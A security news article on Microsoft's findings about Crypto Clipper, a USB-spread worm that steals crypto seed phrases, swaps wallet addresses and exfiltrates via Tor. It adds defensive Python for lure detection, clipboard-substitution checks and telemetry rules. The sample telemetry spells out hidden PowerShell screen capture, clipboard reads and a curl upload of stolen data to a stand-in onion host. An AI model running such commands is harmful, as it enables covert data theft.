Microsoft discovers new lightweight backdoor that steals cryptocurrency

Microsoft says it has detected new self-propagating malware that spreads through USB drives, hunts for cryptocurrency credentials, and sends what it finds to attacker-controlled servers. The company named the worm Crypto Clipper because it monitors the device clipboard for text matching the format of wallet addresses or seed phrases. When it finds a match, the malware also takes five screenshots over a 10-second period.

Both the credentials and the screenshots are then sent to the attacker through Tor, an overlay network that provides anonymous routing by relaying traffic through a chain of nodes so that no single node, and no single node's logs, sees both the sending and the receiving IP address. Crypto Clipper reaches Tor through a SOCKS5 proxy: the bundled Tor client listens on a local port, accepts connections from the malware's scripts, and forwards them into the Tor network toward their final destination.

A lightweight backdoor

“The execution of this clipper is notable because it does not depend on a traditional installer or exposed IP-based C2 infrastructure,” Microsoft said Thursday. “Instead, it deploys a portable Tor client, routes traffic through a local SOCKS5 proxy, and blends data theft with remote code execution, turning a financially motivated stealer into a lightweight backdoor.”

Microsoft said it observed Crypto Clipper spreading through .lnk files on USB drives. A .lnk file is a Windows shortcut: it does not itself contain executable code, but its target and argument fields can launch a command when the shortcut is opened. When an infected USB drive is plugged into a device and a user opens one of the lure shortcuts, the launched command checks whether the malware is already installed on the machine; if it isn't, it downloads the malware through the Tor proxy. To better conceal the worm, the malware scans the infected USB drive and gives its .lnk files names similar to those of files already present there.
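A quick way to hunt for lures of this kind on a removable drive is to look for .lnk files whose names mirror another entry on the same drive (a "Photos.lnk" beside a "Photos" folder, a "report.lnk" beside "report.docx"). The scan below is an added example written for this article, not Microsoft's tooling and not code from the malware; the drive layout it builds is constructed inline, and the assumption is that the lures sit in the drive root.

```python
import os
import tempfile


def find_lnk_lures(root):
    """Return .lnk files in `root` whose name shadows a non-shortcut entry there."""
    entries = os.listdir(root)
    # Everything on the drive that is not itself a shortcut.
    real_names = {e for e in entries if not e.lower().endswith(".lnk")}
    # Index the stems too, so "report.lnk" is matched against "report.docx".
    real_stems = {os.path.splitext(e)[0].lower() for e in real_names}
    lures = []
    for entry in entries:
        if not entry.lower().endswith(".lnk"):
            continue
        stem = os.path.splitext(entry)[0]
        if stem in real_names or stem.lower() in real_stems:
            lures.append(entry)
    return sorted(lures)


def build_sample_drive():
    """Constructed USB drive layout for the example (not real worm output)."""
    root = tempfile.mkdtemp(prefix="usb_")
    os.mkdir(os.path.join(root, "Photos"))          # a genuine folder
    for name in ("report.docx", "readme.txt",      # genuine files
                 "Photos.lnk", "report.lnk",       # lures shadowing real entries
                 "Installer.lnk"):                 # a shortcut with no twin
        with open(os.path.join(root, name), "w"):
            pass
    return root


if __name__ == "__main__":
    drive = build_sample_drive()
    print(find_lnk_lures(drive))  # ['Photos.lnk', 'report.lnk']
```

A shortcut without a twin is not flagged; the heuristic only catches the naming trick described above, so pair it with inspection of the shortcut's target field before treating a hit as benign or malicious.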

Crypto Clipper monitors clipboard contents for patterns consistent with standardized 12- or 24-word seed phrases (the BIP-39 mnemonic format most wallets use). When it finds one, it uploads it, along with the screenshots, to the attacker's server. The stealer also replaces wallet addresses it finds on the clipboard with addresses belonging to attacker-controlled wallets, so a victim who copies a recipient address and pastes it into a transaction unknowingly sends the payment to the attacker. Microsoft believes the purpose of the screenshots is to give the attacker context around the captured data.
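The two clipboard checks the clipper relies on, spotting seed-phrase-shaped text and recognising wallet addresses, are the same checks a defender can use to detect address swapping: if the text a user copied and the text that ends up pasted are both addresses of the same format but differ, something rewrote the clipboard. The following is an added example, not code from the malware or from Microsoft. The address regexes are structural only (no checksum validation), the seed-phrase test checks word count and shape rather than the 2048-word BIP-39 list (an assumption made to keep the block self-contained, so ordinary 12-word sentences will also match), and all sample strings are constructed or well-known documentation addresses.

```python
import re

# Structural patterns for common address formats (no checksum validation).
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "btc_bech32": re.compile(r"\bbc1[ac-hj-np-z02-9]{39,59}\b"),
    "eth":        re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
}

# BIP-39 mnemonics are 12 or 24 lowercase words of 3 to 8 letters.
# Assumption: shape check only, without the real wordlist.
MNEMONIC_WORD = re.compile(r"^[a-z]{3,8}$")


def looks_like_seed_phrase(text):
    words = text.strip().split()
    return len(words) in (12, 24) and all(MNEMONIC_WORD.match(w) for w in words)


def find_addresses(text):
    """Return [(kind, address)] for every address-shaped token, leftmost first."""
    found = []
    for kind, pat in ADDRESS_PATTERNS.items():
        for m in pat.finditer(text):
            found.append((m.start(), m.end(), kind, m.group(0)))
    found.sort()
    hits, last_end = [], -1
    for start, end, kind, value in found:
        if start >= last_end:  # drop matches nested inside an earlier one
            hits.append((kind, value))
            last_end = end
    return hits


def classify_clipboard(text):
    """What a clipper would do with this clipboard content."""
    if looks_like_seed_phrase(text):
        return "seed_phrase"
    if find_addresses(text):
        return "wallet_address"
    return "other"


def detect_substitution(copied, pasted):
    """True when copied and pasted hold one address each, same format, different value."""
    a, b = find_addresses(copied), find_addresses(pasted)
    if len(a) != 1 or len(b) != 1:
        return False
    return a[0][0] == b[0][0] and a[0][1] != b[0][1]


# Constructed samples: the BIP-39 test-vector mnemonic and documentation addresses.
SEED = "abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about"
COPIED = "send to 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 today"
PASTED = "send to 1F1tAaz5x1HUXrCNLbtMDqcw6o5GNn4xqX today"
MIXED = "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq and 0x742d35Cc6634C0532925a3b844Bc454e4438f44e"

if __name__ == "__main__":
    print(classify_clipboard(SEED), classify_clipboard(COPIED), classify_clipboard("meeting at 10"))
    print(find_addresses(MIXED))
    print(detect_substitution(COPIED, PASTED))
```

In practice the "copied" value comes from a clipboard-change hook at copy time and the "pasted" value from the transaction form; the point is that the comparison must happen outside the clipboard itself, since the clipper rewrites it in place.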

“This malware family shows how lightweight, script-based stealers can deliver outsized impact when paired with anonymized communications and runtime tasking,” Microsoft said. “The combination of Tor-routed C2, clipboard targeting, screenshot capture, and remote code execution gives attackers both immediate monetization paths and continued control over compromised devices.”

Microsoft Defender for Endpoint detects Crypto Clipper components as Suspicious JavaScript processes and Possible data exfiltrations using Curl. Microsoft Defender Antivirus detects it as Trojan: Win32/CryptoBandits.A. More generically, the strongest indications of infection are script interpreters (the JavaScript host and PowerShell) spawning suspicious child processes, proxy usage on localhost:9050 (Tor's default SOCKS port), screen-capture commands in PowerShell, and signs of clipboard inspection or crypto-address replacement.
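Those generic indicators translate directly into detection rules over process-creation and network-connection telemetry. The block below is an added example, not a Microsoft query and not the vendor's detection logic: it encodes the four indicators as rules and runs them over a constructed set of events (the command lines, the ".onion" host, and the file names are invented for illustration). The rule names, field layout, and the list of script hosts and suspicious children are assumptions chosen for the example.

```python
import re

# Script hosts and the children that are suspicious when spawned by them.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "curl.exe", "tor.exe", "certutil.exe"}
TOR_SOCKS_PORT = 9050

SCREEN_CAPTURE = re.compile(r"CopyFromScreen|System\.Drawing\.Bitmap", re.I)
CLIPBOARD = re.compile(r"Get-Clipboard|Set-Clipboard|Clipboard\]::(Get|Set)Text", re.I)
SOCKS_PROXY = re.compile(r"socks5h?://(127\.0\.0\.1|localhost):9050", re.I)


def evaluate(event):
    """Return the rule names that fire on one telemetry event."""
    hits = []
    if event["type"] == "process":
        parent = event.get("parent", "").lower()
        image = event["image"].lower()
        cmd = event.get("cmdline", "")
        if parent in SCRIPT_HOSTS and image in SUSPICIOUS_CHILDREN:
            hits.append("script_host_spawn")
        if image in {"powershell.exe", "pwsh.exe"} and SCREEN_CAPTURE.search(cmd):
            hits.append("ps_screen_capture")
        if CLIPBOARD.search(cmd):
            hits.append("clipboard_access")
        if image == "curl.exe" and SOCKS_PROXY.search(cmd):
            hits.append("curl_via_tor_socks")
    elif event["type"] == "network":
        if event["dest"] in ("127.0.0.1", "localhost") and event["port"] == TOR_SOCKS_PORT:
            hits.append("local_tor_socks")
    return hits


def scan(events):
    """Run every rule over every event; returns [(event_index, rule_name)]."""
    return [(i, rule) for i, ev in enumerate(events) for rule in evaluate(ev)]


# Constructed telemetry for the example (not captured from a real infection).
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": r'wscript.exe "E:\Photos\update.js"'},
    {"type": "process", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "Add-Type -AssemblyName System.Drawing; '
                '$b = New-Object System.Drawing.Bitmap 1920,1080; '
                '[System.Drawing.Graphics]::FromImage($b).CopyFromScreen(0,0,0,0,$b.Size)"'},
    {"type": "process", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "Get-Clipboard"'},
    {"type": "process", "parent": "wscript.exe", "image": "curl.exe",
     "cmdline": "curl.exe -x socks5h://127.0.0.1:9050 -d @loot.txt http://example.onion/up"},
    {"type": "network", "image": "curl.exe", "dest": "127.0.0.1", "port": 9050},
    {"type": "process", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for index, rule in scan(SAMPLE_EVENTS):
        print(index, rule)
```

Each rule is weak on its own (administrators use Get-Clipboard, developers run curl through proxies); the signal in this family is the combination, so a practical alert should require two or more rules firing for the same process tree within a short window.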